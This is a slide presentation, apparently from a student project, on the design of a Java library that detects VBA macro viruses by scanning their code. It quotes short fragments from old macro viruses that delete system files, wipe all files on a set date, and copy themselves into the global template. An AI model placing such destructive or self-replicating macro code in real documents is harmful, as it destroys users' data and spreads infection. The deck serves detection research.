Design and Implementation of The FiltroMatic™

Presented By:

Lord Viper Scorpion

D4 C0rrupt0r

The Dark Stallion of Chaos

Master of Terror

Why Worry About Macro Viruses?

There are a lot of maladjusted individuals with no better way to deal with their frustration with society

Microsoft allows macros way too many privileges, and this is really easy to exploit

Macro viruses cause a lot of damage– $12.1B in 1999, according to Computer Economics– Melissa alone caused $80 million in damage

Why are Current Methods Ineffective and How can we Improve Them?

Commercial anti-virus programs only check for fingerprints of known viruses

We propose a generalized macro filter that looks for viruses based on the content of the code

How does one determine if code is “bad” or not?

VBA Background

What is VBA and how is it used?– General purpose scripting language for Office

applications– Used to automate repetitive tasks, format documents…

Where does it derive its functionality?– From Application object libraries– From the Windows API, .DLLs on the host system

So what’s the problem?– A VBA macro has the same privileges on the host as a

native executable

Dealing with Microsoft’s Lack of Foresight

How can we compensate for the security vulnerabilities introduced by VBA?– By scanning macros for code that is clearly

malicious– By alerting the user of possible misuse of code that

could go either way– By trying to identify malicious macros without

flagging legitimate ones

Designing a Macro Filter

Background Research– Learned VBA mechanisms– Reviewed known malicious macros– Compiled a list of VBA functions common to macro

viruses– Reviewed legitimate macros to determine where

“gray” areas exist

Example of VBA Malcode

From the “Friends” macro virus:Open “C:\autoexec.bat” For Append As #1

Print #1, “@echo off”

Print #1, “c:\dos\fast.com”

Close #1

Another Example of VBA Malcode

From “Galicia Kalidade” macro virus:If EdicinBuscarEncontrado() <> 0 Then

FijarAtributos "C:\IO.SYS",0

FijarAtributos "C:\MSDOS.SYS",0

Kill "C:\IO.SYS"

Kill "C:\MSDOS.SYS"

Yet Another VBA Malcode Example

From the “Atom” macro virus:Sub MAIN

On Error Goto KillError

If Day(Now()) = 13 And Month(Now() = 12) Then

Kill “*.*”

End If

KillError:

End Sub

Yes, You Guessed It … Another VBA Virus Example

From the “Retro” macro virus:If Not Y Then

F$ = WindowName$()

S$ = F$ + ":Puritan“ MacroCopy S$, "Global:Puritan"

S$ = F$ + ":Rtr“ MacroCopy S$, "Global:Retro"

S$ = F$ + ":FSAB“ MacroCopy S$, "Global:FileSaveAs"

S$ = F$ + ":FSAB“ MacroCopy S$, "Global:FSAB"

S$ = F$ + ":AOB“ MacroCopy S$, "Global:AOB“

End If

Implementation of our Filter

We chose to implement it as a Java library that developers could integrate into their applications.

Implementation consists of MacroScanner, MalCodeItem, MalCodeList, Report, and ReportItem.

Tailored scanner to minimize false positives. What weaknesses does our method have?

Sample of Scanning Results for Malicious Macros

Virus Number WarningsMelissa 11

WordSavr 2

Vengine 2

Polyssa 12

Magnum 17

Hassle 27

Sample of Scanning Results for Legitimate Macros

Macro Number of WarningsGood-1 0

Good-2 0

Good-3 0

Good-4 0

Good-5 0

Good-6 0

Conclusions

Macro viruses tend to use the same mechanisms to spread and attack

Our filter takes advantage of these similarities to detect known and unknown macro viruses